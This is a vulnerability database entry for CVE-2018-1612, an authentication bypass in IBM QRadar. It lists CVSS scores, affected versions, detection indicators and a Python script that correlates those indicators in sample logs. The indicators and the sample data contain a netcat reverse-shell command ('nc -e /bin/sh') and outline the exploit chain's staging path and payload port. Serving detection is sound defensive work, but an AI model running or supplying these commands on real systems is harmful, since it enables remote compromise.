CVE-2018-1612
published 2018-07-17

Priority: P2 · 58 · medium · 5.8 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:C / C:L / I:N / A:N
EXPLOIT
EPSS: 56.95% (98.9th percentile)
IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM X-Force ID: 144164.

Affected (6 ranges)

Vendor | Product | Version range | Fixed in
ibm | qradar_security_information_and_event_manager | |
ibm | qradar_security_information_and_event_manager | |
ibm | qradar_security_information_and_event_manager | |
ibm | qradar_security_information_and_event_manager | 7.2.0 – 7.2.8 |
ibm | qradar_siem | |
ibm | qradar_siem | |

Detection & IOCs (extracted from sources)

url: /ForensicsAnalysisServlet/
url: /ForensicsAnalysisServlet/?action=setSecurityTokens
cookie: SEC=<uuid>; QRadarCSRF=<uuid>
path: /store/configservices/staging/updates/
path: /opt/qradar/conf/nva.conf
path: /opt/qradar/support/changePasswd.sh
port: 443
port: 4448
command: /usr/bin/nc -e /bin/sh <LHOST> <LPORT> &
  • Alert on GET requests to /ForensicsAnalysisServlet/ returning HTTP 403 — the module uses this as a fingerprint to confirm the vulnerable endpoint is present.
  • Monitor for new or modified files written under /store/configservices/staging/updates/ by the 'nobody' user — this is where the attacker-controlled shell script is staged for root execution.
  • Detect outbound HTTP/HTTPS connections from the QRadar host to attacker-controlled infrastructure on non-standard port 4448, used to download the privilege escalation payload.
  • Alert on execution of /usr/bin/nc with the -e flag spawned from a QRadar process context — this is the reverse shell command dropped and executed as part of the exploit chain.
  • The exploit chain requires three CVEs chained together (CVE-2016-9722, CVE-2018-1418, CVE-2018-1612); correlate all three in SIEM alerts for high-confidence detection of this specific attack.
  • The Forensics web application is disabled in QRadar Community Edition but the vulnerable code is still present and reachable, meaning all QRadar flavours are exploitable regardless of whether Forensics is enabled.
  • Confirmed vulnerable versions span IBM QRadar SIEM up to 7.2.8 patch 12 and 7.3.1 patch 3; detections should cover both 7.2 and 7.3 branches.
  • The exploit's final privilege escalation stage relies on a QRadar scheduled task executing the attacker's script as root; the delay between initial compromise and root execution can be up to ~80 seconds, which may affect timing-based detections.
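The detection bullets above describe four independent indicators plus a correlation rule and a timing caveat. The following Python is an added example, not taken from the page's sources or from any vendor detection content, that applies those indicators to a constructed, normalized event stream and correlates hits per host inside a window long enough to absorb the ~80 s scheduler delay. The event format (`<epoch> <host> <type> <detail>`), the hostnames, the IP address and the file name `run.sh` are all assumptions made for the sample; only the paths, port and command shape come from the IOC list.

```python
import re
from collections import defaultdict

# Constructed sample events (assumed format, not real QRadar telemetry):
# "<epoch> <host> <type> <detail>", where type is http, file, net or proc.
SAMPLE_EVENTS = """\
1531900000 qradar01 http GET /ForensicsAnalysisServlet/ 403
1531900002 qradar01 http GET /ForensicsAnalysisServlet/?action=setSecurityTokens 200
1531900010 qradar01 net out 198.51.100.7:4448
1531900015 qradar01 file write nobody /store/configservices/staging/updates/run.sh
1531900090 qradar01 proc root /usr/bin/nc -e /bin/sh 198.51.100.7 4444
1531900100 qradar02 http GET /console/ 200
1531900105 qradar02 file write nobody /store/tmp/x
"""

# Values taken from the IOC list on this page.
FORENSICS_PATH = "/ForensicsAnalysisServlet/"
STAGING_DIR = "/store/configservices/staging/updates/"
PAYLOAD_PORT = 4448
# Window chosen to cover the ~80 s delay before the staged script runs as root.
CORRELATION_WINDOW = 120  # seconds


def classify(line):
    """Map one event line to (host, ts, indicator), or None if it matches nothing."""
    parts = line.split(maxsplit=3)
    if len(parts) < 4:
        return None
    ts, host, etype, detail = int(parts[0]), parts[1], parts[2], parts[3]

    if etype == "http":
        m = re.match(r"(\w+) (\S+) (\d{3})$", detail)
        if m:
            method, path, status = m.groups()
            # Token-setting request against the Forensics servlet.
            if path.startswith(FORENSICS_PATH) and "action=setSecurityTokens" in path:
                return host, ts, "forensics_token_request"
            # GET on the servlet answered with 403: the endpoint fingerprint.
            if method == "GET" and path.startswith(FORENSICS_PATH) and status == "403":
                return host, ts, "forensics_fingerprint"
    elif etype == "file":
        # A file written under the staging directory by the 'nobody' user.
        m = re.match(r"write (\S+) (\S+)$", detail)
        if m and m.group(1) == "nobody" and m.group(2).startswith(STAGING_DIR):
            return host, ts, "staging_write_by_nobody"
    elif etype == "net":
        # Outbound connection to the non-standard payload port.
        m = re.match(r"out \S+:(\d+)$", detail)
        if m and int(m.group(1)) == PAYLOAD_PORT:
            return host, ts, "outbound_payload_port"
    elif etype == "proc":
        # /usr/bin/nc launched with -e from any user context.
        argv = detail.split()[1:]
        if argv and argv[0] == "/usr/bin/nc" and "-e" in argv:
            return host, ts, "nc_reverse_shell"
    return None


def correlate(text, min_indicators=3):
    """Group indicator hits per host; a host is high-confidence when at least
    min_indicators distinct indicator kinds occur within CORRELATION_WINDOW
    seconds of its first hit."""
    hits = defaultdict(list)
    for line in text.splitlines():
        hit = classify(line)
        if hit:
            host, ts, indicator = hit
            hits[host].append((ts, indicator))

    alerts = {}
    for host, events in hits.items():
        events.sort()
        t0 = events[0][0]
        kinds = {ind for ts, ind in events if ts - t0 <= CORRELATION_WINDOW}
        alerts[host] = {
            "indicators": sorted(kinds),
            "high_confidence": len(kinds) >= min_indicators,
        }
    return alerts


if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result)
```

With the sample stream, `qradar01` accumulates all five indicator kinds inside the window and is flagged high-confidence, while `qradar02` produces no hits at all: its write by `nobody` lands outside the staging directory, which is the distinction the second bullet draws. Raising `min_indicators` trades recall for precision; lowering `CORRELATION_WINDOW` below roughly 80 s risks splitting the root-execution stage from the initial web requests, as the last bullet warns.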

CVSS provenance

NVD v3.0: 5.8 (MEDIUM), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
NVD v2.0: 5.0 (MEDIUM), vector AV:N/AC:L/Au:N/C:P/I:N/A:N